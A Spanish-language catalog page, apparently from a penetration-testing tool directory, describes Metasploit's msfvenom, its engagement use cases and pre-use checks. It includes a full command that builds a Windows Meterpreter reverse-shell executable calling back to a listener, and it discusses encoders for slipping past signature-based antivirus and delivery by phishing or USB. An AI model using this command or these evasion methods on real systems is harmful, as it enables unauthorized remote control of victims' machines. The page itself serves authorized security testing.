X-MSF
msfvenom
Generador de payloads independiente de Metasploit para crear y codificar payloads personalizados en varios formatos.
Sitio oficialVolver al catálogo
RESUMEN
msfvenom (parte de github.com/rapid7/metasploit-framework) fusiona lo que antes eran dos herramientas separadas, msfpayload y msfencode, en una única utilidad de línea de comandos para generar un payload de Metasploit como artefacto independiente: shellcode crudo, un script, o un ejecutable/APK/ELF/Mach-O completo, en el formato exacto que pide un escenario de entrega, sin necesidad de correr msfconsole en absoluto.
Soporta todo el catálogo de payloads del framework (Meterpreter, shells reverse/bind simples y más) además de encoders pensados para ayudar a un payload a sobrevivir a filtrado ingenuo basado en firmas — una salida que luego se entrega por el vector que pida el escenario del engagement: un adjunto de correo, un payload dejado en un USB, o un archivo subido a través de una app web ya explotada.
CASOS DE USO
Casos de uso en un engagement
- 01
Crear un ejecutable/DLL/APK Meterpreter independiente para un escenario de phishing o acceso físico del engagement.
- 02
Generar shellcode crudo en un formato específico para incrustarlo en un exploit o loader a medida en desarrollo.
- 03
Producir un payload en un formato no Windows/Linux (APK, Mach-O) para un escenario de entrega móvil o macOS.
- 04
Probar si el AV/EDR de un objetivo marca una combinación específica de payload/encoder, como parte de una evaluación de capacidad de detección.
PRIMEROS PASOS
Cuando un escenario necesita un archivo de payload independiente (ejecutable, script, shellcode) en vez de un exploit desde la consola — adjuntos de phishing, medios físicos o entrega manual.
- Confirma que el escenario de entrega (phishing, medio físico, subida) y el uso del payload están explícitamente autorizados.
- Elige un payload acorde a la plataforma objetivo y al método de callback permitido por las reglas de egress de red.
- Genera el payload en el formato de salida requerido (exe, elf, apk, raw, etc.) con msfvenom.
- Configura el handler correspondiente (multi/handler en msfconsole) antes de entregar el payload.
- Entrega el payload por el vector acordado y documenta el comando exacto y las opciones usadas.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o payload.exeANTES DE USARLA
Qué revisar antes de lanzarla
Los payloads por defecto de msfvenom y sus encoders integrados están ampliamente detectados por firma en el AV/EDR más común — espera que la mayoría de la salida sin modificar sea marcada, y trata esa detección como un dato en sí mismo, no como un obstáculo a esquivar sin que el cliente lo sepa.
Cualquier payload generado capaz de callback/ejecución es efectivamente malware — constrúyelo, almacénalo y transmítelo bajo las mismas reglas de manejo que el engagement acordó para herramientas ofensivas, y elimínalo de los sistemas objetivo durante la limpieza.
LHOST/LPORT y el egress de red deben coincidir con lo que el entorno objetivo realmente permite salir — confirma que la vía de callback funciona dentro de las restricciones de red del engagement antes de depender de ella durante un test acotado en el tiempo.